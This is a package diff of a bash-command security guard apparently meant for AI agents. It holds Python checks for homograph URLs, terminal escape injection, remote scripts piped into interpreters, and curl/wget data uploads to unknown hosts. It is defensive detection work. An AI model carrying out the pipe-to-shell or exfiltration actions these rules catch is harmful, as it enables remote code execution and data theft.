@contextfort-ai/openclaw-secure 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bin/openclaw-secure.js +101 -0
- package/monitor/analytics.js +60 -0
- package/monitor/analytics.py +62 -0
- package/monitor/bash_guard/__init__.py +7 -0
- package/monitor/bash_guard/checker.py +13 -0
- package/monitor/bash_guard/checks/__init__.py +110 -0
- package/monitor/bash_guard/checks/command_shape.py +84 -0
- package/monitor/bash_guard/checks/ecosystem.py +153 -0
- package/monitor/bash_guard/checks/environment.py +15 -0
- package/monitor/bash_guard/checks/hostname.py +183 -0
- package/monitor/bash_guard/checks/path.py +57 -0
- package/monitor/bash_guard/checks/terminal.py +44 -0
- package/monitor/bash_guard/checks/transport.py +155 -0
- package/monitor/bash_guard/checks/utils.py +93 -0
- package/monitor/bash_guard/data/confusables.txt +97 -0
- package/monitor/bash_guard/data/known_domains.csv +119 -0
- package/monitor/bash_guard/data.py +71 -0
- package/monitor/bash_guard/patterns.py +126 -0
- package/monitor/monitor.py +56 -0
- package/monitor/prompt_injection_guard/index.js +141 -0
- package/monitor/skills_guard/index.js +300 -0
- package/openclaw-secure.js +418 -0
- package/package.json +16 -0
package/monitor/bash_guard/checks/hostname.py
@@ -0,0 +1,183 @@
+import re
+import regex
+from ..patterns import (
+    LOOKALIKE_TLDS,
+    INVALID_HOST_CHARS,
+    UNICODE_DOTS,
+)
+from ..data import get_known_domains, skeleton, is_known_domain
+from .utils import levenshtein, extract_host_from_url
+
+
+def check_non_ascii_hostname(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        host = extract_host_from_url(url)
+        if host and any(ord(c) > 127 for c in host):
+            return ("non_ascii_hostname", f"Non-ASCII characters in hostname: {host}")
+
+    return None
+
+
+def check_mixed_script_in_label(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        host = extract_host_from_url(url)
+        if not host:
+            continue
+
+        for label in host.split("."):
+            if not label:
+                continue
+
+            scripts = set()
+            for char in label:
+                if char == "-" or char.isdigit():
+                    continue
+
+                if regex.match(r'\p{Script=Latin}', char):
+                    scripts.add('Latin')
+                elif regex.match(r'\p{Script=Cyrillic}', char):
+                    scripts.add('Cyrillic')
+                elif regex.match(r'\p{Script=Greek}', char):
+                    scripts.add('Greek')
+                elif regex.match(r'\p{Script=Han}', char):
+                    scripts.add('Han')
+                elif regex.match(r'\p{Script=Hiragana}', char):
+                    scripts.add('Hiragana')
+                elif regex.match(r'\p{Script=Katakana}', char):
+                    scripts.add('Katakana')
+                elif regex.match(r'\p{Script=Arabic}', char):
+                    scripts.add('Arabic')
+                elif regex.match(r'\p{Script=Hebrew}', char):
+                    scripts.add('Hebrew')
+
+            if len(scripts) > 1:
+                return ("mixed_script_in_label", f"Mixed scripts in hostname label '{label}': {scripts}")
+
+    return None
+
+
+def check_userinfo_trick(command):
+    urls = re.findall(r'https?://([^@/\s]+)@[^\s]+', command)
+
+    for userinfo in urls:
+        if "." in userinfo:
+            return ("userinfo_trick", f"Domain-like userinfo in URL: {userinfo}@...")
+
+    return None
+
+
+def check_confusable_domain(command):
+    known_domains = get_known_domains()
+    if not known_domains:
+        return None
+
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        host = extract_host_from_url(url)
+        if not host:
+            continue
+
+        host_lower = host.lower()
+
+        if host_lower in known_domains:
+            continue
+
+        host_skeleton = skeleton(host_lower)
+
+        for known in known_domains:
+            if host_skeleton == known and host_lower != known:
+                return ("confusable_domain", f"Domain '{host}' is visually similar to known domain '{known}'")
+
+            if len(known) >= 8:
+                len_diff = abs(len(host_lower) - len(known))
+                if len_diff <= 3 and levenshtein(host_lower, known) == 1:
+                    return ("confusable_domain", f"Domain '{host}' is 1 edit from known domain '{known}'")
+
+    return None
+
+
+def check_invalid_host_chars(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        host = extract_host_from_url(url)
+        if not host:
+            continue
+
+        for char in host:
+            if char in INVALID_HOST_CHARS:
+                return ("invalid_host_chars", f"Invalid character '{char}' in hostname")
+            if char in UNICODE_DOTS:
+                return ("invalid_host_chars", f"Unicode dot character in hostname: U+{ord(char):04X}")
+            if ord(char) < 0x20 or char.isspace():
+                return ("invalid_host_chars", "Control character or whitespace in hostname")
+
+    return None
+
+
+def check_trailing_dot_whitespace(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        host = extract_host_from_url(url)
+        if not host:
+            continue
+
+        if host.endswith("."):
+            return ("trailing_dot_whitespace", "Trailing dot in hostname")
+        if host[-1:].isspace():
+            return ("trailing_dot_whitespace", "Trailing whitespace in hostname")
+
+    return None
+
+
+def check_non_standard_port(command):
+    standard_ports = {80, 443, 22, 9418}
+
+    url_port_pattern = r'https?://([^:/\s]+):(\d+)'
+    matches = re.findall(url_port_pattern, command)
+
+    for host, port_str in matches:
+        try:
+            port = int(port_str)
+        except ValueError:
+            continue
+
+        if port in standard_ports:
+            continue
+
+        if is_known_domain(host.lower()):
+            return ("non_standard_port", f"Non-standard port {port} on known domain '{host}'")
+
+    return None
+
+
+def check_lookalike_tld(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+    for url in urls:
+        host = url.split("://")[1].split("/")[0].split(":")[0].lower()
+        tld = host.rsplit(".", 1)[-1] if "." in host else ""
+        if tld in LOOKALIKE_TLDS:
+            return ("lookalike_tld", f"Lookalike TLD detected: .{tld}")
+
+    return None
+
+
+def check_punycode_domain(command):
+    if "xn--" in command.lower():
+        return ("punycode_domain", "Punycode domain detected (potential homograph)")
+
+    return None
+
+
+def check_raw_ip_url(command):
+    ipv4_pattern = r'https?://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
+    if re.search(ipv4_pattern, command):
+        return ("raw_ip_url", "URL uses raw IP address instead of domain")
+
+    return None
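For orientation, a hedged usage sketch of two of the hostname checks above. It assumes the package directory is importable as monitor.bash_guard (the module layout implied by the file list) and that the third-party regex dependency is installed; the command strings and .example hosts are made up for illustration.

# Hypothetical usage sketch -- import path and sample commands are assumptions.
from monitor.bash_guard.checks.hostname import check_raw_ip_url, check_punycode_domain

# A raw-IP download URL trips check_raw_ip_url.
print(check_raw_ip_url("curl http://203.0.113.7/install.sh"))
# ('raw_ip_url', 'URL uses raw IP address instead of domain')

# Any "xn--" (punycode) label trips check_punycode_domain.
print(check_punycode_domain("wget https://xn--gthub-zra.example/cli"))
# ('punycode_domain', 'Punycode domain detected (potential homograph)')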
package/monitor/bash_guard/checks/path.py
@@ -0,0 +1,57 @@
+import re
+from ..patterns import KNOWN_SENSITIVE_PATHS
+from .utils import levenshtein
+
+
+def check_non_ascii_path(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        try:
+            parts = url.split("://")[1].split("/", 1)
+            if len(parts) < 2:
+                continue
+            path = "/" + parts[1]
+        except IndexError:
+            continue
+
+        if any(ord(c) > 127 for c in path):
+            return ("non_ascii_path", "Non-ASCII characters in URL path")
+
+    return None
+
+
+def check_homoglyph_in_path(command):
+    urls = re.findall(r'https?://[^\s]+', command)
+
+    for url in urls:
+        try:
+            path = url.split("://")[1].split("/", 1)
+            if len(path) < 2:
+                continue
+            path = "/" + path[1]
+        except IndexError:
+            continue
+
+        for segment in path.split("/"):
+            if not segment:
+                continue
+
+            has_ascii = any(c.isascii() and c.isalpha() for c in segment)
+            has_non_ascii = any(ord(c) > 127 for c in segment)
+
+            if has_ascii and has_non_ascii:
+                segment_lower = segment.lower()
+                for known in KNOWN_SENSITIVE_PATHS:
+                    if levenshtein(segment_lower, known) <= 2:
+                        return ("homoglyph_in_path", f"Potential homoglyph in path: '{segment}' looks like '{known}'")
+
+    return None
+
+
+def check_double_encoding(command):
+    if "%25" in command:
+        if re.search(r'%25[0-9a-fA-F]{2}', command):
+            return ("double_encoding", "Double-encoded URL path detected (%25XX)")
+
+    return None
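A similarly hedged sketch for the double-encoding check above (same importability assumption; the URL is invented).

# Hypothetical usage sketch for check_double_encoding.
from monitor.bash_guard.checks.path import check_double_encoding

# "%252e" is "%2e" percent-encoded a second time, so the %25XX pattern matches.
print(check_double_encoding("curl https://cdn.example/%252e%252e/etc/passwd"))
# ('double_encoding', 'Double-encoded URL path detected (%25XX)')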
package/monitor/bash_guard/checks/terminal.py
@@ -0,0 +1,44 @@
+from ..patterns import (
+    BIDI_CONTROL_CHARS,
+    ZERO_WIDTH_CHARS,
+    HIDDEN_COMMAND_INDICATORS,
+)
+
+
+def check_terminal_injection(command):
+    if '\x1b[' in command or '\x1b]' in command or '\x1b_' in command or '\x1bP' in command:
+        return ("ansi_escapes", "ANSI escape sequences detected")
+
+    for char in command:
+        code = ord(char)
+        if code < 0x20 and char not in ('\n', '\t', '\x1b'):
+            return ("control_chars", f"Control character detected: 0x{code:02x}")
+        if code == 0x7f:
+            return ("control_chars", "DEL control character detected")
+
+    for char in command:
+        if char in BIDI_CONTROL_CHARS:
+            return ("bidi_controls", f"Bidirectional control character: U+{ord(char):04X}")
+
+    for char in command:
+        if char in ZERO_WIDTH_CHARS:
+            return ("zero_width_chars", f"Zero-width character: U+{ord(char):04X}")
+
+    return None
+
+
+def check_hidden_multiline(command):
+    lines = command.split('\n')
+    if len(lines) <= 1:
+        return None
+
+    for i, line in enumerate(lines[1:], 1):
+        trimmed = line.strip()
+        if not trimmed:
+            continue
+
+        for indicator in HIDDEN_COMMAND_INDICATORS:
+            if indicator in trimmed:
+                return ("hidden_multiline", f"Hidden command on line {i+1}: {trimmed[:60]}")
+
+    return None
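And a hedged sketch for the terminal-injection check (same import-path assumption; the payload is just an ANSI clear-screen sequence).

# Hypothetical usage sketch for check_terminal_injection.
from monitor.bash_guard.checks.terminal import check_terminal_injection

# "\x1b[" (CSI) is caught by the first ANSI-escape test.
print(check_terminal_injection('echo "\x1b[2J hidden"'))
# ('ansi_escapes', 'ANSI escape sequences detected')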
package/monitor/bash_guard/checks/transport.py
@@ -0,0 +1,155 @@
+import re
+from ..patterns import (
+    INTERPRETERS,
+    INSECURE_TLS_FLAGS,
+    URL_SHORTENERS,
+    CURL_UPLOAD_FLAGS,
+    WGET_UPLOAD_FLAGS,
+)
+from ..data import is_known_domain
+from .utils import split_commands, extract_host_from_url
+
+
+def check_insecure_tls_flags(command):
+    words = command.split()
+    for word in words:
+        clean = word.strip("'\"")
+        if clean in INSECURE_TLS_FLAGS:
+            return ("insecure_tls_flags", f"Insecure TLS flag: {clean}")
+
+    return None
+
+
+def check_shortened_url(command):
+    command_lower = command.lower()
+    for shortener in URL_SHORTENERS:
+        if shortener in command_lower:
+            return ("shortened_url", f"Shortened URL detected: {shortener}")
+
+    return None
+
+
+def _check_plain_http_to_sink_single(command):
+    """Check a single command for plain HTTP piped to sink."""
+    if "http://" not in command.lower():
+        return None
+
+    if "|" not in command:
+        return None
+
+    parts = command.split("|")
+    for part in parts[1:]:
+        words = part.strip().split()
+        if words:
+            cmd = words[0].lower().rsplit("/", 1)[-1]
+            if cmd in INTERPRETERS or cmd in ("sudo", "env"):
+                return ("plain_http_to_sink", "Plain HTTP URL piped to interpreter")
+
+    return None
+
+
+def check_plain_http_to_sink(command):
+    """Check for plain HTTP to sink, handling && and ; separators."""
+    for subcmd in split_commands(command):
+        result = _check_plain_http_to_sink_single(subcmd)
+        if result:
+            return result
+    return None
+
+
+def _check_schemeless_to_sink_single(command):
+    """Check a single command for schemeless URL piped to sink."""
+    if "|" not in command:
+        return None
+
+    schemeless_pattern = r'(?<!\w://)(?<!\w://www\.)([a-zA-Z0-9][-a-zA-Z0-9]*\.[a-zA-Z]{2,})/\S+'
+
+    parts = command.split("|")
+    first_part = parts[0]
+
+    if re.search(schemeless_pattern, first_part):
+        for part in parts[1:]:
+            words = part.strip().split()
+            if words:
+                cmd = words[0].lower().rsplit("/", 1)[-1]
+                if cmd in INTERPRETERS or cmd in ("sudo", "env"):
+                    return ("schemeless_to_sink", "Schemeless URL piped to interpreter")
+
+    return None
+
+
+def check_schemeless_to_sink(command):
+    """Check for schemeless URL to sink, handling && and ; separators."""
+    for subcmd in split_commands(command):
+        result = _check_schemeless_to_sink_single(subcmd)
+        if result:
+            return result
+    return None
+
+
+_LOCALHOST_HOSTS = {"localhost", "127.0.0.1", "::1"}
+
+
+def _check_curl_upload_single(command):
+    """Check a single command for curl/wget uploading data to unknown hosts."""
+    words = command.split()
+    if not words:
+        return None
+
+    cmd = words[0].rsplit("/", 1)[-1].lower()
+    if cmd not in ("curl", "wget"):
+        return None
+
+    upload_flags = CURL_UPLOAD_FLAGS if cmd == "curl" else WGET_UPLOAD_FLAGS
+
+    has_upload_flag = False
+    for word in words[1:]:
+        clean = word.strip("'\"")
+        # Exact match: -d, --data, etc.
+        if clean in upload_flags:
+            has_upload_flag = True
+            break
+        # Prefix match for flag=value: --data=foo, --post-file=secrets.txt
+        for flag in upload_flags:
+            if clean.startswith(flag + "="):
+                has_upload_flag = True
+                break
+        if has_upload_flag:
+            break
+
+    if not has_upload_flag:
+        return None
+
+    # Extract URL and check host
+    for word in words[1:]:
+        clean = word.strip("'\"")
+        if re.match(r'https?://', clean, re.IGNORECASE):
+            host = extract_host_from_url(clean)
+            if not host:
+                continue
+            host_lower = host.lower()
+            if host_lower in _LOCALHOST_HOSTS:
+                return None
+            # Check full host first (e.g. api.github.com), then parent domain
+            if is_known_domain(host_lower):
+                return None
+            parts = host_lower.split(".")
+            if len(parts) > 2:
+                parent = ".".join(parts[-2:])
+                if is_known_domain(parent):
+                    return None
+            return (
+                "curl_upload_to_unknown",
+                f"Data upload via {cmd} to unknown host: {host}",
+            )
+
+    return None
+
+
+def check_curl_upload(command):
+    """Check for curl/wget data uploads to unknown hosts, handling && and ; separators."""
+    for subcmd in split_commands(command):
+        result = _check_curl_upload_single(subcmd)
+        if result:
+            return result
+    return None
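A hedged sketch of the pipe-to-interpreter check above (import path assumed as before; the host is invented). Note that split_commands only splits on "&&", "||", and ";", so the pipe stays inside a single sub-command.

# Hypothetical usage sketch for check_plain_http_to_sink.
from monitor.bash_guard.checks.transport import check_plain_http_to_sink

# A plain-HTTP fetch piped into "sudo bash" matches the sink list.
print(check_plain_http_to_sink("curl http://get.example/install.sh | sudo bash"))
# ('plain_http_to_sink', 'Plain HTTP URL piped to interpreter')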
package/monitor/bash_guard/checks/utils.py
@@ -0,0 +1,93 @@
+def split_commands(command):
+    """
+    Split on && ; || while respecting quotes and escapes.
+    Note: Does not handle $() or () subshells.
+    """
+    result = []
+    current = []
+    i = 0
+    in_single = False
+    in_double = False
+
+    while i < len(command):
+        char = command[i]
+
+        # Backslash escape (not in single quotes - they're literal there)
+        if char == '\\' and not in_single and i + 1 < len(command):
+            current.append(char)
+            current.append(command[i + 1])
+            i += 2
+            continue
+
+        if char == '"' and not in_single:
+            in_double = not in_double
+            current.append(char)
+        elif char == "'" and not in_double:
+            in_single = not in_single
+            current.append(char)
+        elif not in_single and not in_double:
+            if command[i:i+2] in ('&&', '||'):
+                if current:
+                    result.append(''.join(current).strip())
+                    current = []
+                i += 2
+                continue
+            elif char == ';':
+                if current:
+                    result.append(''.join(current).strip())
+                    current = []
+            else:
+                current.append(char)
+        else:
+            current.append(char)
+        i += 1
+
+    if current:
+        result.append(''.join(current).strip())
+
+    return [c for c in result if c] or [command]
+
+
+def levenshtein(a, b):
+    m, n = len(a), len(b)
+    if m == 0:
+        return n
+    if n == 0:
+        return m
+
+    dp = [[0] * (n + 1) for _ in range(m + 1)]
+    for i in range(m + 1):
+        dp[i][0] = i
+    for j in range(n + 1):
+        dp[0][j] = j
+
+    for i in range(1, m + 1):
+        for j in range(1, n + 1):
+            cost = 0 if a[i-1] == b[j-1] else 1
+            dp[i][j] = min(
+                dp[i-1][j] + 1,
+                dp[i][j-1] + 1,
+                dp[i-1][j-1] + cost
+            )
+
+    return dp[m][n]
+
+
+def extract_host_from_url(url):
+    try:
+        if "://" in url:
+            rest = url.split("://")[1]
+        else:
+            rest = url
+
+        if "@" in rest.split("/")[0]:
+            rest = rest.split("@")[-1]
+
+        host_part = rest.split("/")[0]
+
+        if ":" in host_part:
+            host_part = host_part.rsplit(":", 1)[0]
+
+        return host_part
+    except (IndexError, ValueError):
+        return None
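utils.py has no intra-package imports, so the sketch below only assumes the module is on the import path; the sample commands and hosts are invented.

# Hypothetical usage sketch for the helpers above.
from monitor.bash_guard.checks.utils import split_commands, extract_host_from_url, levenshtein

# Splits on "&&" but not on a single "|", and respects quoting.
print(split_commands("curl -s http://a.example/x | bash && echo done"))
# ['curl -s http://a.example/x | bash', 'echo done']

# Strips scheme, userinfo, and port before returning the host.
print(extract_host_from_url("https://user@evil.example:8443/path"))
# 'evil.example'

# One substitution apart.
print(levenshtein("github.com", "githud.com"))
# 1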
package/monitor/bash_guard/data/confusables.txt
@@ -0,0 +1,97 @@
+# Subset of Unicode confusable characters relevant to URL security
+# Format: confusable_codepoint target_codepoint # comment
+# Based on Unicode TR39 confusables.txt
+# Cyrillic -> Latin
+0430 0061 # а -> a
+0435 0065 # е -> e
+043E 006F # о -> o
+0440 0070 # р -> p
+0441 0063 # с -> c
+0443 0079 # у -> y
+0445 0078 # х -> x
+0456 0069 # і -> i
+0458 006A # ј -> j
+04BB 0068 # һ -> h
+0410 0041 # А -> A
+0412 0042 # В -> B
+0415 0045 # Е -> E
+041A 004B # К -> K
+041C 004D # М -> M
+041D 0048 # Н -> H
+041E 004F # О -> O
+0420 0050 # Р -> P
+0421 0043 # С -> C
+0422 0054 # Т -> T
+0425 0058 # Х -> X
+# Greek -> Latin
+03B1 0061 # α -> a
+03B5 0065 # ε -> e
+03B9 0069 # ι -> i
+03BF 006F # ο -> o
+03C1 0070 # ρ -> p
+03C5 0075 # υ -> u
+03C7 0078 # χ -> x
+# Fullwidth Latin
+FF21 0041 # Ａ -> A
+FF22 0042 # Ｂ -> B
+FF23 0043 # Ｃ -> C
+FF24 0044 # Ｄ -> D
+FF25 0045 # Ｅ -> E
+FF26 0046 # Ｆ -> F
+FF27 0047 # Ｇ -> G
+FF28 0048 # Ｈ -> H
+FF29 0049 # Ｉ -> I
+FF2A 004A # Ｊ -> J
+FF2B 004B # Ｋ -> K
+FF2C 004C # Ｌ -> L
+FF2D 004D # Ｍ -> M
+FF2E 004E # Ｎ -> N
+FF2F 004F # Ｏ -> O
+FF30 0050 # Ｐ -> P
+FF31 0051 # Ｑ -> Q
+FF32 0052 # Ｒ -> R
+FF33 0053 # Ｓ -> S
+FF34 0054 # Ｔ -> T
+FF35 0055 # Ｕ -> U
+FF36 0056 # Ｖ -> V
+FF37 0057 # Ｗ -> W
+FF38 0058 # Ｘ -> X
+FF39 0059 # Ｙ -> Y
+FF3A 005A # Ｚ -> Z
+FF41 0061 # ａ -> a
+FF42 0062 # ｂ -> b
+FF43 0063 # ｃ -> c
+FF44 0064 # ｄ -> d
+FF45 0065 # ｅ -> e
+FF46 0066 # ｆ -> f
+FF47 0067 # ｇ -> g
+FF48 0068 # ｈ -> h
+FF49 0069 # ｉ -> i
+FF4A 006A # ｊ -> j
+FF4B 006B # ｋ -> k
+FF4C 006C # ｌ -> l
+FF4D 006D # ｍ -> m
+FF4E 006E # ｎ -> n
+FF4F 006F # ｏ -> o
+FF50 0070 # ｐ -> p
+FF51 0071 # ｑ -> q
+FF52 0072 # ｒ -> r
+FF53 0073 # ｓ -> s
+FF54 0074 # ｔ -> t
+FF55 0075 # ｕ -> u
+FF56 0076 # ｖ -> v
+FF57 0077 # ｗ -> w
+FF58 0078 # ｘ -> x
+FF59 0079 # ｙ -> y
+FF5A 007A # ｚ -> z
+# Common lookalikes
+0131 006C # ı -> l (dotless i looks like l)
+0269 0069 # ɩ -> i
+026A 0069 # ɪ -> i
+1D00 0041 # ᴀ -> A (small cap)
+029F 004C # ʟ -> L
+0280 0052 # ʀ -> R
+# Dot variants
+FF0E 002E # ． -> . (fullwidth dot)
+3002 002E # 。 -> . (ideographic period)
+FF61 002E # ｡ -> . (halfwidth ideographic period)
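The table's format is documented in its own header: a hex confusable codepoint, a hex ASCII target, and a trailing comment. The package's actual loader lives in monitor/bash_guard/data.py and is not shown in this excerpt; the sketch below is only a plausible reading of that format, with hypothetical function names.

# Hypothetical loader for the confusables table format above (not the package's data.py).
def load_confusables(path):
    mapping = {}
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            fields = line.split()              # e.g. "0430 0061 # а -> a"
            src, dst = fields[0], fields[1]
            mapping[chr(int(src, 16))] = chr(int(dst, 16))
    return mapping

def fold_confusables(text, mapping):
    """Replace each confusable character with its ASCII target."""
    return "".join(mapping.get(c, c) for c in text)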